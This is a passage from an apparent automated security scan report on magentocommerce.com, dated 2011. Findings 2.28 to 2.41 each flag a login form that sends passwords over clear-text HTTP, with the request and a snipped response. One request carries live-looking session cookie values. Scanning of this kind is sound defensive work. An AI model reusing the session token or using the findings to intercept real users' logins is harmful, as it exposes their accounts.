Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpci-compliance%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:18 GMT
Content-Length: 35471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.28. http://www.magentocommerce.com/company/press-releases  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/press-releases HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175819; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:40 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.29. http://www.magentocommerce.com/company/press-releases/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/press-releases/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175845; expires=Sat, 11-Aug-2012 15:04:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:05 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.30. http://www.magentocommerce.com/company/privacy  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/privacy

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/privacy HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fprivacy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:52 GMT
Content-Length: 49802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.31. http://www.magentocommerce.com/company/terms  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/terms

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company/terms HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175839; expires=Sat, 11-Aug-2012 15:03:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fterms%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:59 GMT
Content-Length: 41069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.32. http://www.magentocommerce.com/de  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /de

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /de HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176483; expires=Sat, 11-Aug-2012 15:14:43 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fde%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:44 GMT
Content-Length: 69992

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- me
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.33. http://www.magentocommerce.com/demo  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /demo

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /demo HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175788; expires=Sat, 11-Aug-2012 15:03:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fdemo%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:08 GMT
Content-Length: 39549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.34. http://www.magentocommerce.com/design_guide  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /design_guide

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /design_guide HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176273; expires=Sat, 11-Aug-2012 15:11:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fdesign_guide%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:13 GMT
Content-Length: 35263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.35. http://www.magentocommerce.com/dk  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /dk

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /dk HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176568; expires=Sat, 11-Aug-2012 15:16:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fdk%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:09 GMT
Content-Length: 39933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.36. http://www.magentocommerce.com/download  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /download HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/product/emerging-business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170943; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.10.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:47:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171254; expires=Sat, 11-Aug-2012 13:47:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:47:34 GMT
Content-Length: 170988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.37. http://www.magentocommerce.com/download/diff  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/diff

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /download/diff HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176284; expires=Sat, 11-Aug-2012 15:11:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fdownload%2Fdiff%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:24 GMT
Content-Length: 70455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.38. http://www.magentocommerce.com/download/login_form  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/login_form

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /download/login_form HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176319; expires=Sat, 11-Aug-2012 15:12:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fdownload%2Flogin_form%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:00 GMT
Content-Length: 5065

<div class="login-popup" id="registerWindow">
<div class="login-popup-cont">
<div class="col2-set">
<div class="col-1">
<h3>Login, it's Easy!</h3>

...[SNIP]...
</div>
<form action="http://www.magentocommerce.com/products/customer/account/loginPost/" method="post">
<input type="hidden" name="return_url" value="http://www.magentocommerce.com/download" />
...[SNIP]...
<dd><input type="password" id="fVal_password" class="fValidate['required'] input-text" name="login[password]" size="20" value="" maxlength="32" /></dd>
...[SNIP]...
2.39. http://www.magentocommerce.com/download/release_notes  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/release_notes

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /download/release_notes HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176308; expires=Sat, 11-Aug-2012 15:11:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fdownload%2Frelease_notes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:49 GMT
Content-Length: 282941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.40. http://www.magentocommerce.com/es  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /es

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /es HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176528; expires=Sat, 11-Aug-2012 15:15:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:28 GMT
Content-Length: 69388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.41. http://www.magentocommerce.com/fr  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /fr

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /fr HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Ffr%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 71918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
